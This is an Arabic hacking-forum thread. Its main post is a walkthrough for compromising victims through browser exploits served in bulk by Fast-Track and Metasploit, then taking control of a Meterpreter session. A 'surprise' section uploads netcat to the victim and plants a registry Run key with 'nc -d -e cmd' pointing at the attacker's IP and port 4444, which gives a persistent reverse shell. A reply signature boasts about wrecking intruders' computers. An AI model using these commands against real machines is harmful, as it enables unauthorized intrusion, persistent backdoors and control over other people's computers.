حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track

حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track


النتائج 1 إلى 2 من 2

الموضوع: حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track

  1. #1

    Gadid حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته ..

    وشلونكم ؟

    ندخل في صلب الموضوع ..

    طبعا المكتوب واضح من عنوانه ..

    راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side

    طيب يا عامر وش يعني ؟

    باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي ..

    طيب ندخل على التيرمنال .. بوضعية الجذر

    و نكتب الامر لدخول مجلد الفاست تراك

    كود:

    cd/pentest/exploits/fasttrack


    لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون ..

    طيب نشغله بالامر ..

    كود:

    ./fast-track.py -i


    -i تعني تشغيل السكربت داخل التيرمنال ..

    الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد

    هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4

    من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا )

    من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته ..

    ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا ..

    الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر ..

    ننتظر الى ان تنتهي .. بكملة Server started

    بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل )

    عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة ..

    ندخل لها بالامر

    كود:

    sessions -i 1

    1 يعني رقم الجلسة ..

    الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل

    ================================================== =========


    دور المفاجئة :-

    المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل ..

    اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..

    كود:

    upload /tmp/nc***** C:\\windows\\system32\\nc*****

    الان ندخل على موجه الاوامر تبع الضحية ..

    كود:

    execute -c -H -f cmd***** -i

    وش السواة الحين ؟

    امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444

    مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..

    و هذا هو الامر كامل

    كود:

    reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/

    reg add : واضح .. امر بدائي لاضافة اي مفتاح
    hklm : و تعني مجلد HKEY_LOCAL_MACHINE
    /v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile
    /t : و تعني نوع المفتاح و في الاغلب يكون reg_sz
    /d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444

    الان و بعد زرع المفتاح ..

    نروح للتيرمنال و ونتنصت على البورت 4444 ..

    كود:

    nc -vlp 4444


    و الضحية راح يشبك معك يوميا ..

    اي استفسارات انا موجود .. بالخدمة

  2. #2
    هكر متميز الصورة الرمزية kaiser hackers
    تاريخ التسجيل
    Jan 2012
    الدولة
    United Kingdom-Britain-London
    المشاركات
    751

    افتراضي رد: حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track

    قــــــيــــــصــــــر الــــــهــــــكــــــر

    أذآ فكرت في أختراقي سآرفع يدي أحترآم لك ولشجاعتك

    ولآكن تأكد أنني لن أنزلها ألى على حرق جهازك

    لآ أحب دخول الآجهزة بأحترآم أحب دخول الآجهزة بآجرام

    لتوآصل[email protected]

    قناتي على اليوتيوب



المواضيع المتشابهه

  1. [للمحترفين] الاختراق بمعظم ثغرات المتصفح + مفاجئة
    بواسطة M.Bomb في المنتدى قسم الثغرات
    مشاركات: 7
    آخر مشاركة: 09-26-2012, 04:58 AM
  2. حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة M3tasploit , Fast-track
    بواسطة noureno-rca في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 0
    آخر مشاركة: 09-08-2012, 07:12 PM
  3. ادخل و حمل ثغرات المتصفح جاهزة للتلغيم
    بواسطة pSyCh0_3D في المنتدى قسم اختراق الأجهزة
    مشاركات: 8
    آخر مشاركة: 04-03-2011, 02:58 PM
  4. ثغرات المتصفح
    بواسطة angelbeeboo في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 12-11-2010, 10:43 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •